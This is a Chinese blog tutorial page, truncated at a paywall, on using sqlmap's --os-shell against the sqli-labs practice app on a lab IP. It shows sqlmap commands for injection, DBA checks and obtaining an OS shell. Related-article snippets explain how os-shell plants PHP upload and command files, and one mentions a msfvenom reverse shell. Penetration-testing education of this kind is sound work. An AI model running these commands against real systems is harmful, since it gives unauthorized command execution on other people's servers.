sqlmap 如何 --os-shell 及反弹shell_sqlmap跑shell

于 2024-04-12 02:48:17 发布
阅读量934 收藏 14
点赞数 15
分类专栏: 2024年程序员学习 文章标签: android ffmpeg
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77033340/article/details/137660470
版权
本文介绍了如何利用sqlmap工具进行--os-shell操作,以获取网站服务器的管理员权限,并通过反弹shell进行进一步控制。在确认具备DBA权限后,通过msfvenom生成PHP的Meterpreter反向TCP shell代码,实现反弹shell。此外,文章还提及作者的网络安全学习资源分享,包括大厂面试经验、学习笔记和实战项目等。
摘要由CSDN通过智能技术生成

漏洞利用

访问网站网址​​​​​​

http:192.168.126.130/sqlilabs/sqli-labs-master/Less-2/

① sqlmap注入测试

http://192.168.126.192/sqlilabs/sqli-labs-master/Less-2/?id=1

② --is-dba

在使用 –os-shell 获取操作系统 shell 的时候,要先确定当前用户是否为管理员权限。

sqlmap -u http://192.168.126.192/sqlilabs/sqli-labs-master/Less-2/?id=1 --is-dba

③–os-shell

如果 current user is DBA: Ture 说明可以对靶机目录/文件进行

sqlmap -u http://192.168.126.192/sqlilabs/sqli-labs-master/Less-2/?id=1 --os-shell
最低0.47元/天 解锁文章
蓉城垡
关注
  • 15
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap绕过d盾_Sqlmap实现osshell自定义shell,免杀打穿一把梭
weixin_39589693的博客
12-08 626
起因今天在公司划水时,无意间看到了一篇关于sqlmap os-shell功能的刨析文章。该文章详细描述了os-shell的具体流程,但是该作者最后在实现自定义shell时翻车了…于是就有了这篇文章就像该作者所说,这种确实有点多此一举。但是也不是没有用武之地,如果对方网络管理员发现了异常的流量可能会临时上传查杀工具对网站进行木马的查杀,这时植入一个免杀的shell可能会为我们渗透赢得宝贵的...
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
sqlmap 如何 --os-shell反弹shell
weixin_63580357的博客
10-17 1055
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap的--os-shell
m0_71300782的博客
09-06 723
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
sqlmap之--os-shell
qq_45927819的博客
03-26 1万+
1、–os-shell原理 使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。 –os-shell的执行条件: dbms为mysql,网站必须是root权限 攻击者需要知道网站的绝对路径 magic_quotes_gpc = off,php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master
sqlmap --os-shell选项原理解析
来日可期的博客
10-18 1926
sqlmap的--os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。
sqlmap os-shell原理
信安路上……
12-04 2663
sqlmap os-shell原理 0x01 流程 i. 简单判断 从截图显示中,可以看到有以下几步 1、选择 web 应用语言 2、发现(提供)一个可写的绝对路径 3、顺序(不同方法)上传tmpujout.php、tmpbvwsp.php两个文件 ii. 流量分析 主要的http流量有 4 条,第 2 条根据@@version_compile_os首字母判断操作系统,第 4 ...
sqlmap mysql shell,sqlmap --os-shell执行原理(mysql篇)
weixin_34965737的博客
03-27 1373
sqlmap --os-shell执行原理对于mysql数据库来说,--os-shell的本质就是写入两个shell文件,其中的一个可以让我们用来执行命令,而另外一个,如果在网站访问的话,可以让我们可以上传文件。说到写入shell,就要说一下两个限制条件,首先,我们需要知道上传文件的两个限制条件,首先我们要知道网站的绝对路径(我们的shell写入到哪里),然后要有导入导出的权限。导入导出的权限在m...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
5. 高级功能:如需执行自定义SQL命令,可以使用`sqlmap -p parameter --sql-shell`进入交互模式。 四、防御SQL注入的策略 1. 输入验证:对用户输入进行严格的过滤和检查,避免非法字符。 2. 参数化查询:使用预...
mysql osshell_sqlmap os-shell探索
weixin_42529366的博客
02-07 540
1 条件网站的绝对路径mysql进程有网站绝对路径的写权限mysql用户为rootmysql允许写[secure_file_priv]GPC关闭2 过程dvwa-low-sqli为例sqlmap -u "http://ip/vulnerabilities/sqli/?id=111&Submit=Submit#" --cookie='PHPSESSID=t875bj3h4imdvhk7vce...
sqlmap --os-shell上传shell
04-12
b的意思是运行命令的前缀,sqlmap是一款自动化SQL注入工具。--os-shell表示运行命令并打开操作系统的shell。上述命令的含义是在SQL注入后上传一个shell并打开操作系统的shell,以便执行系统命令。
sqlmap (--os-shell)的使用
千寻的博客
11-04 9万+
第一步 搭建存在sql注入的网站 第二步 扫描注入点 python sqlmap.py -u "http://192.168.232.129/cms/show.php?id=33" --os-shell 第三步 选择网站的语言 第四步 输入网站的角度路径 第五步 查看权限
sqlmap的--os-shell玩法
Bul1et的博客
12-25 1万+
首先找到注入点 证明存在注入漏洞 然后使用命令 sqlmap.py -r D:\1.txt -p username --random-agent --is-dba 看看是不是dba 这里不是dba所以不能使用--os-shell命令 如果是的话 例如 python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...
sqlmap os-shell解析
weixin_50464560的博客
07-13 719
Background 最近遇到测试环境,最后利用sqlmap的–os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 工具:sqlmap 靶机: 系统:windows7 环境:wamp搭建的apache、mysql和php 网页源码:phpmywind,此处修改了点源代码,方便进行
sqlmap --os-shell 原理详解
..
04-13 2万+
os-shell 执行原理 对于mysql数据库来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下,如下图。 然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。 这是单看tmpbylqf.php的执行效果: 过程演示 本次实验环境是本机上搭建的sqli-libs,目的为了研究--os-shell的原理,..
--os-shell
xhscxj的博客
09-27 511
启动sqlmap查看当前注入点数据库权限是否为True sqlmap-u “http://172.26.240.90/sqli-labs-master/Less-1/?id=1” --is-dba 通过–sql-shell寻找数据库绝对路径 sql-shell> select @@datadir; 通过数据库的位置我们可以知道一个大致的路径,并自己猜测当前站点的路径 常见的找绝对路径方法: 网页报错信息 phpinfo、探针 数据库查询、暴力破解 参看:常用的绝对路径收集 查看php是否开启魔术
sqlmap 使用os-shell的必要条件
a519470764的专栏
06-13 8863
转载自:https://www.cnblogs.com/lcamry/p/5505110.htmlos-shell的使用通过上述的分析,我们知道了sqlmap os-shell参数的用法以及原理。很多的人会对os-shell的使用进行吐槽,这是得要多大的权限才能执行。是的,os-shell的执行条件有三个(1)网站必须是root权限(2)攻击者需要知道网站的绝对路径(3)GPC为off,php主动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值